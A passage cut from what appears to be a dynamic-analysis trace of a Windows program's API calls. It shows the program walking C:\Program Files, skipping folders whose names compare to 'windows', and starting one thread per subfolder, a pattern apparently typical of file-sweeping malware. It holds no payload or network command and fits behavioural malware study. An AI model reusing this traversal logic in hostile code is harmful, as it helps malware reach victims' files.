lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0038.550] lstrcmpW (lpString1=".", lpString2="DVD Maker") returned -1 [0038.550] lstrcmpW (lpString1="..", lpString2="DVD Maker") returned -1 [0038.550] lstrcmpiW (lpString1="windows", lpString2="DVD Maker") returned 1 [0038.552] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.552] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.552] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="DVD Maker" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker") returned="\\\\?\\C:\\Program Files\\DVD Maker" [0038.552] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0038.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x40d0048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.560] CloseHandle (hObject=0x1a8) returned 1 [0038.560] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0038.560] lstrcmpW (lpString1=".", lpString2="Internet Explorer") returned -1 [0038.560] lstrcmpW (lpString1="..", lpString2="Internet Explorer") returned -1 [0038.560] lstrcmpiW (lpString1="windows", lpString2="Internet Explorer") returned 1 [0038.561] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.561] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.561] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Internet Explorer" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer") returned="\\\\?\\C:\\Program Files\\Internet Explorer" [0038.561] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\*.*" [0038.561] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41301e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.584] CloseHandle (hObject=0x1a8) returned 1 [0038.584] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0038.584] lstrcmpW (lpString1=".", lpString2="Microsoft Analysis Services") returned -1 [0038.584] lstrcmpW (lpString1="..", lpString2="Microsoft Analysis Services") returned -1 [0038.584] lstrcmpiW (lpString1="windows", lpString2="Microsoft Analysis Services") returned 1 [0038.587] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.587] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.587] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Microsoft Analysis Services" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services" [0038.587] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*.*" [0038.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4190388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.597] CloseHandle (hObject=0x1a8) returned 1 [0038.597] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x10a3ae10, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10a3ae10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0038.597] lstrcmpW (lpString1=".", lpString2="Microsoft Office") returned -1 [0038.597] lstrcmpW (lpString1="..", lpString2="Microsoft Office") returned -1 [0038.597] lstrcmpiW (lpString1="windows", lpString2="Microsoft Office") returned 1 [0038.598] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.598] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.598] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Microsoft Office" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office") returned="\\\\?\\C:\\Program Files\\Microsoft Office" [0038.598] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\*.*" [0038.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41f0528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.608] CloseHandle (hObject=0x1a8) returned 1 [0038.608] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0038.608] lstrcmpW (lpString1=".", lpString2="Microsoft SQL Server Compact Edition") returned -1 [0038.608] lstrcmpW (lpString1="..", lpString2="Microsoft SQL Server Compact Edition") returned -1 [0038.608] lstrcmpiW (lpString1="windows", lpString2="Microsoft SQL Server Compact Edition") returned 1 [0038.609] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.609] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.609] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Microsoft SQL Server Compact Edition" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition" [0038.609] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*" [0038.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x42506c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.620] CloseHandle (hObject=0x1a8) returned 1 [0038.620] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0038.620] lstrcmpW (lpString1=".", lpString2="Microsoft Sync Framework") returned -1 [0038.620] lstrcmpW (lpString1="..", lpString2="Microsoft Sync Framework") returned -1 [0038.620] lstrcmpiW (lpString1="windows", lpString2="Microsoft Sync Framework") returned 1 [0038.622] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.622] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.622] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Microsoft Sync Framework" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework" [0038.622] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\*.*" [0038.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5be80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.632] CloseHandle (hObject=0x1a8) returned 1 [0038.632] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0038.632] lstrcmpW (lpString1=".", lpString2="Microsoft Synchronization Services") returned -1 [0038.632] lstrcmpW (lpString1="..", lpString2="Microsoft Synchronization Services") returned -1 [0038.632] lstrcmpiW (lpString1="windows", lpString2="Microsoft Synchronization Services") returned 1 [0038.633] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.633] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.633] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Microsoft Synchronization Services" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services" [0038.633] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\*.*" [0038.634] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c602b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.644] CloseHandle (hObject=0x1a8) returned 1 [0038.644] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0038.644] lstrcmpW (lpString1=".", lpString2="MSBuild") returned -1 [0038.644] lstrcmpW (lpString1="..", lpString2="MSBuild") returned -1 [0038.644] lstrcmpiW (lpString1="windows", lpString2="MSBuild") returned 1 [0038.645] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.645] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.645] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="MSBuild" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild") returned="\\\\?\\C:\\Program Files\\MSBuild" [0038.645] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\MSBuild", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\MSBuild\\*.*") returned="\\\\?\\C:\\Program Files\\MSBuild\\*.*" [0038.646] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cd84c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.663] CloseHandle (hObject=0x1a8) returned 1 [0038.663] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1046d870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1046d870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0038.663] lstrcmpW (lpString1=".", lpString2="Reference Assemblies") returned -1 [0038.663] lstrcmpW (lpString1="..", lpString2="Reference Assemblies") returned -1 [0038.663] lstrcmpiW (lpString1="windows", lpString2="Reference Assemblies") returned 1 [0038.664] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.664] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.664] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Reference Assemblies" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies") returned="\\\\?\\C:\\Program Files\\Reference Assemblies" [0038.664] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\*.*" [0038.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d38660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.733] CloseHandle (hObject=0x1a8) returned 1 [0038.733] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0038.733] lstrcmpW (lpString1=".", lpString2="Uninstall Information") returned -1 [0038.733] lstrcmpW (lpString1="..", lpString2="Uninstall Information") returned -1 [0038.733] lstrcmpiW (lpString1="windows", lpString2="Uninstall Information") returned 1 [0038.735] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.735] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.735] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Uninstall Information" | out: lpString1="\\\\?\\C:\\Program Files\\Uninstall Information") returned="\\\\?\\C:\\Program Files\\Uninstall Information" [0038.735] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Uninstall Information", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Uninstall Information\\*.*") returned="\\\\?\\C:\\Program Files\\Uninstall Information\\*.*" [0038.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f18e80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.736] CloseHandle (hObject=0x1a8) returned 1 [0038.736] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0038.736] lstrcmpW (lpString1=".", lpString2="Windows Defender") returned -1 [0038.736] lstrcmpW (lpString1="..", lpString2="Windows Defender") returned -1 [0038.736] lstrcmpiW (lpString1="windows", lpString2="Windows Defender") returned -1 [0038.738] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.738] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Windows Defender" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender") returned="\\\\?\\C:\\Program Files\\Windows Defender" [0038.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0038.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f30ee8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.739] CloseHandle (hObject=0x1a8) returned 1 [0038.739] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0038.739] lstrcmpW (lpString1=".", lpString2="Windows Journal") returned -1 [0038.739] lstrcmpW (lpString1="..", lpString2="Windows Journal") returned -1 [0038.739] lstrcmpiW (lpString1="windows", lpString2="Windows Journal") returned -1 [0038.740] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.740] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.740] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Windows Journal" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal") returned="\\\\?\\C:\\Program Files\\Windows Journal" [0038.740] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0038.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f48f50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.741] CloseHandle (hObject=0x1a8) returned 1 [0038.741] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0038.741] lstrcmpW (lpString1=".", lpString2="Windows Mail") returned -1 [0038.741] lstrcmpW (lpString1="..", lpString2="Windows Mail") returned -1 [0038.741] lstrcmpiW (lpString1="windows", lpString2="Windows Mail") returned -1 [0038.742] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.742] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.743] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Windows Mail" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail") returned="\\\\?\\C:\\Program Files\\Windows Mail" [0038.743] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0038.743] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f60fb8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.743] CloseHandle (hObject=0x1a8) returned 1 [0038.743] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0038.743] lstrcmpW (lpString1=".", lpString2="Windows Media Player") returned -1 [0038.744] lstrcmpW (lpString1="..", lpString2="Windows Media Player") returned -1 [0038.744] lstrcmpiW (lpString1="windows", lpString2="Windows Media Player") returned -1 [0038.745] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.745] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.745] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Windows Media Player" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player") returned="\\\\?\\C:\\Program Files\\Windows Media Player" [0038.745] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0038.745] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f79020, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.746] CloseHandle (hObject=0x1a8) returned 1 [0038.746] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0038.746] lstrcmpW (lpString1=".", lpString2="Windows NT") returned -1 [0038.746] lstrcmpW (lpString1="..", lpString2="Windows NT") returned -1 [0038.746] lstrcmpiW (lpString1="windows", lpString2="Windows NT") returned -1 [0038.747] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\*.*") returned="\\\\?\\C:\\Program Files\\*.*" [0038.747] lstrlenW (lpString="\\\\?\\C:\\Program Files\\*.*") returned 24 [0038.747] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\", lpString2="Windows NT" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT") returned="\\\\?\\C:\\Program Files\\Windows NT" [0038.747] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\*.*" [0038.747] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f91088, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0038.748] CloseHandle (hObject=0x1a8) returned 1 [0038.748] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x380fd30 | out: lpFindFileData=0x380fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0038.748] lstrcmpW (lpString1=".", lpString2="Windows Photo Viewer") returned -1 [0038.748] lstrcmpW (lpString1="..", lpString2="Windows Photo Viewer") returned -1 [0038.748] 